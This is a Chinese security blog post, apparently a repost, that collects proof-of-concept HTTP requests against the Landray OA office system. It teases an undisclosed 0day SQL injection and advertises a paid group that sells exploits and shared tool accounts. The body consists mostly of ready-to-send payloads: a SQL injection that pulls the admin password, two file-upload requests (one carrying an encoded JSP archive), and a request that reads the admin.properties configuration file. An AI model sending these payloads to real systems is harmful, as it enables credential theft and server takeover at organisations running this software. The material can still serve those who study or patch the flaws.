文章总结: 这篇文章介绍了蓝凌OA系统的多个已知漏洞POC,包括SQL注入、任意文件上传和远程命令执行等,并声称发现了一个新的0daySQL注入漏洞。文章主要目的是推广作者的付费圈子,其中包含完整的0day详情和其他安全资源。 综合评分: 79 文章分类: 漏洞分析,漏洞POC,0day,WEB安全,代码审计
【0day】蓝凌OA再爆SQL注入
原创
SharkSec
SharkSec
2025年12月14日 19:42 湖南
🔔 温馨提示:为了防止走散,不错过每一篇干货内容,请记得将公众号设置为星标!🌟
【声明】本文技术、思路及工具仅用于合法安全测试与防御研究,严禁用于非法入侵、攻击他人系统或盈利等违法违规行为,一切后果由操作者自行承担,作者及团队不承担任何连带责任。
引 言
蓝凌OA是一款基于Java EE架构开发,该系统承载着业务数据与核心工作流程,模块复杂且支持高度定制,因此在攻防对抗中已成为攻击者重点攻击的目标之一。本文整理了多个相关漏洞的POC,并在文末附0day信息。
1
wechatLoginHelper SQL注入
POST /third/wechat/wechatLoginHelper.do HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: Content-Type: application/x-www-form-urlencodedContent-Length: 147
method=edit&uid=1'and+(SELECT+fdPassword%2B'----'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1
2
任意文件上传
POST /eis/service/api.aspx?action=saveImg HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Length: 197Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu------WebKitFormBoundaryxdgaqmquContent-Disposition: form-data; name="file"filename="icfitnya.txt"Content-Type: text/htmljmnqjfdsupxgfidopeixbgsxbf------WebKitFormBoundaryxdgaqmqu--
3
custom远程命令执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Accept: */*Referer: http://www.ynjd.cn:801//sys/ui/extend/varkind/custom.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=E53E077373AF06F1A07FB56C93CF835BConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 42
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
4
sysUiExtend.do任意文件上传
POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest
-----------------------------260140030128010173621878123124Content-Disposition: form-data; name="file"; filename="guyue.zip"Content-Type: application/x-zip-compressed
{{base64dec(UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==)}}-----------------------------260140030128010173621878123124--
上述所涉漏洞均为已公开的历史漏洞POC整理,接下来给大家公布的0day则是通过本地搭建环境、审计代码并进行安全分析所得。
5
0day–SQL注入
关于本次0day的详情,为安全起见将不再公开至公众号,后续完整内容将统一上传至纷传,后期也会陆续更新某蝶,某云等0day和1day,敬请期待~
如果大家对我们的文章技术有什么建议或者工具使用上的反馈,都欢迎大家在评论区留言交流。对我们分享的文章感兴趣,想要深入探讨、交流并学习更多相关内容,也欢迎各位师傅加入官方技术交流群!!!(关注公众号,点击菜单栏:联系我们->技术交流群,添加管理员微信,备注【加群】,拉您进群)
加入圈子,一起进阶!
我们圈子刚建设开放不久,大量福利来袭:有一线团队的一手攻防经验、私有工具源码(包括咱们公众号发的工具,圈子里能直接拿源码 + 持续迭代),还有漏洞挖掘的 POC/EXP、每月定期两次 0day 分享,hw实战攻防遇见高频oa/设备源码都能在这拿到。
技术方向也刚好对标咱们平时的需求:工具开发、漏洞挖掘、代码审计、实战攻防这些全涵盖,甚至连 AI 安全的新玩法也会同步。
对了,圈子里还有些「刚需资源」:FOFA 的 Key 长期能用,Cursor Pro 共享账号登了就能用; 企业 SRC 案例、红队实战经验也会拆解着讲。
现在圈子现价 119 / 人,等满 100 人就涨到 129 了 —— 入了圈子还能进专属内部群,比咱们公开交流群的资源更新更实时、讨论也更深度。
纷传和知识星球内容是同步的,后期主要运营纷传,所以想进圈子的朋友直接扫描下方二维码就可以啦~
结束
👉 点击关注不迷路,一起潜入深水区,突破边界,共同精进!🚀
查看原文:《【0day】蓝凌OA再爆SQL注入》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论